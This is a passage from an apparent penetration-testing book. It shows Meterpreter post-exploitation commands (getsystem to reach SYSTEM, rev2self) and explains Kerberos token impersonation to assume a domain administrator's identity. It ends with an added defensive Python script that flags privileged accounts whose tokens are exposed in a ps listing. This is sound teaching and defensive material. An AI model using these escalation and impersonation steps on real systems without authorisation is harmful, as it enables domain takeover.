Meterpreter
87
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
To switch back to the previous user account where we initially got our Meterpreter shell, we’d use rev2self.
Token Impersonation
In token impersonation, we grab a Kerberos token on the target’s machine and then use it in place of authentication to assume the identity of the user that originally created that token. Token impersonation is very beneficial for penetration tests and can be one of Meterpreter’s most powerful features.
Consider the following scenario, for example: You’re performing a penetration test at your organization, and you successfully compromise the system and establish a Meterpreter console. A domain administrator account has logged on within the last 13 hours. When this account logs on, a Kerberos token is passed to the server (single sign-on) and is valid for a certain period of time. You exploit this system via the valid and active Kerberos token, and through Meterpreter you successfully assume the role of a domain administrator, without needing the password. Then you hack a domain administrator account or go after a domain controller. This is probably one of the easiest ways to gain access to a system and just another example of why Meterpreter is so useful.
Using ps
For this example, we’ll use the Meterpreter function ps to list the applications running and show under which account they are running. We’ll use the domain name SNEAKS.IN and the user account ihazdomainadmin.
meterpreter > ps

Process list
============

 PID  Name              Arch  Session  User                       Path
 ---  ----              ----  -------  ----                       ----
 0    [System Process]
 4    System            x86   0        NT AUTHORITY\SYSTEM
 380  cmd.exe           x86   0        SNEAKS.IN\ihazdomainadmin  \SystemRoot\System32\cmd.exe
 . . . SNIP . . .

meterpreter >
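The same listing read from the defender’s side, as an added example that is not from the book: it parses a ps table in the column-aligned layout shown above and reports which privileged accounts own live processes on the host (and therefore have tokens sitting there to be reused), which is exactly what a tiering or admin-logon review is looking for. The sample listing, the WORKSTATION\alice row and the privileged-account list are constructed for the example.

```python
import re

# Constructed sample in the column-aligned layout Meterpreter's ps prints
# (hosts, accounts and paths are made up for the example).
SAMPLE_PS = r"""
Process list
============
 PID   Name              Arch  Session  User                       Path
 ---   ----              ----  -------  ----                       ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 380   cmd.exe           x86   0        SNEAKS.IN\ihazdomainadmin  \SystemRoot\System32\cmd.exe
 812   explorer.exe      x86   1        WORKSTATION\alice          C:\Windows\explorer.exe
 . . . SNIP . . .
"""


def parse_ps(text):
    """Parse a ps listing into dicts keyed by header name. Column boundaries
    come from the dashed underline row and each column runs up to the start
    of the next, so values wider than their header ("[System Process]") still
    land in the right field and empty trailing columns stay empty."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if re.fullmatch(r"\s*-+(\s+-+)*\s*", line):
            header, rows = lines[i - 1], lines[i + 1:]
            starts = [m.start() for m in re.finditer(r"-+", line)]
            break
    else:
        raise ValueError("no column underline row found")
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [header[s:e].strip() for s, e in bounds]
    records = []
    for row in rows:
        fields = [row[s:e].strip() for s, e in bounds]
        if not fields[0].isdigit():  # blank lines and ". . . SNIP . . ." markers
            continue
        records.append(dict(zip(names, fields)))
    return records


def exposed_privileged_tokens(records, privileged_accounts):
    """Return {account: [pids]} for every privileged account that owns a live
    process on this host, i.e. whose token is exposed to impersonation."""
    wanted = {a.lower() for a in privileged_accounts}
    exposed = {}
    for rec in records:
        if rec["User"].lower() in wanted:
            exposed.setdefault(rec["User"], []).append(int(rec["PID"]))
    return exposed
```

Run it over a listing exported from a workstation and any domain-admin entry in the result is a logon that tiering policy says should not be happening there.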